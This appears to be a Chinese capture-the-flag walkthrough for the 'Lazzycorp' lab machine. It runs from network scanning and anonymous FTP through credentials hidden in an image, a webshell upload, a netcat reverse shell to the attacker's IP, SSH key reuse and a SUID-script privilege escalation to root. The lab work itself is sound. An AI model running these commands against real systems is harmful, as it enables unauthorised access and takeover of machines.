Lazzycorp

image

信息搜集

主机发现

1
2
3
4
5
6
7
8
root@LAPTOP-O235O5EH [~] ➜  arp-scan -l                                                                                        [17:43:21]
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 10.156.131.149
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.156.131.40   08:00:27:b7:a9:99       PCS Systemtechnik GmbH
......

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.940 seconds (131.96 hosts/sec). 3 responded

10.156.131.40

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.156.131.40                                                                          [17:43:26]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.156.131.40:22
Open 10.156.131.40:21
Open 10.156.131.40:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 17:43 CST
Initiating ARP Ping Scan at 17:43
Scanning 10.156.131.40 [1 port]
Completed ARP Ping Scan at 17:43, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:43
Completed Parallel DNS resolution of 1 host. at 17:43, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:43
Scanning 10.156.131.40 [3 ports]
Discovered open port 21/tcp on 10.156.131.40
Discovered open port 22/tcp on 10.156.131.40
Discovered open port 80/tcp on 10.156.131.40
Completed SYN Stealth Scan at 17:43, 0.01s elapsed (3 total ports)
Nmap scan report for 10.156.131.40
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-01-19 17:43:54 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:B7:A9:99 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

80/tcp目录扫描

image

image

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@LAPTOP-O235O5EH [~] ➜  gobuster dir -u http://10.156.131.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.156.131.40
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              zip,js,py,sh,swp,php,html,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 582]
/blog                 (Status: 301) [Size: 313] [--> http://10.156.131.40/blog/]
/uploads              (Status: 301) [Size: 316] [--> http://10.156.131.40/uploads/]
/robots.txt           (Status: 200) [Size: 55]
/server-status        (Status: 403) [Size: 278]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================

/robots.txt存在两个禁止访问的

但要注意Linux中web服务器路径是大小写敏感的。换成小写就对了返回了403

image

扫描一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@LAPTOP-O235O5EH [~] ➜  gobuster dir -u http://10.156.131.40/auth-lazycorp-dev -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.156.131.40/auth-lazycorp-dev
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              sh,txt,zip,bak,js,py,swp,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 710]
/uploads              (Status: 301) [Size: 334] [--> http://10.156.131.40/auth-lazycorp-dev/uploads/]
/dashboard.php        (Status: 302) [Size: 0] [--> login.php]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================

/login.php但是我们并不知道账号和密码,

根据前面的提示

image

可以知道凭证在图片里面。

同时前面rustscan扫出来21端口这是ftp的端口

ftp探测

匿名FTP是FTP协议的一个特性,允许用户无需提供有效的用户名和密码即可访问FTP服务器上的公共区域。通常,用户使用”anonymous”作为用户名,并且可以使用自己的电子邮件地址作为密码,尽管很多服务器实际上并不验证这个“密码”。

这里直接回车不用输入密码

1
2
3
4
5
6
7
8
root@LAPTOP-O235O5EH [~] ➜  lftp 10.156.131.40 -u anonymous                                                                    [18:04:41]
Password:
lftp anonymous@10.156.131.40:~> ls
drwxr-xr-x    2 114      119          4096 Jul 16  2025 pub
lftp anonymous@10.156.131.40:/> cd pub/
lftp anonymous@10.156.131.40:/pub> ls
-rw-r--r--    1 0        0         1366786 Jul 16  2025 note.jpg
lftp anonymous@10.156.131.40:/pub>

note.jpg这就与前面的对上了,下载下来

1
get note.jpg

使用随波逐流大法

image

Username: dev
Password: d3v3l0pm3nt!nt3rn

image

登录成功是一个文件上传的功能

直接上传一句话木马文件,上传之后不知道在哪

但是之前在扫描/auth-lazycorp-dev的时候知道有一个uploads文件夹,经过尝试发现就是这个

image

提权

www shell

反弹shell

1
busybox nc 10.156.131.64 7777 -e /bin/bash

image

www-data -> arvind

在/home/arvind目录下存在arvind的私钥

可以利用私钥直接登录

1
ssh arvind@10.156.131.40 -i /home/arvind/.ssh/id_rsa

arvind -> root

在家目录中,有一个reset拥有suid权限

image

可以看到调用了/usr/bin/reset_site.sh

1
2
arvind@arvindlazycorp:~$ ls -al /usr/bin/reset_site.sh
-rwxrwxr-x 1 root arvind 19 Jan 19 10:22 /usr/bin/reset_site.sh

既然拥有rwx权限那么在里面写入我们自定义的命

1
2
3
arvind@arvindlazycorp:~$ vim /usr/bin/reset_site.sh
arvind@arvindlazycorp:~$ cat /usr/bin/reset_site.sh
chmod +s /bin/bash

触发恶意命令

1
2
3
4
./reset

arvind@arvindlazycorp:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash

发现成功设置SUID位

image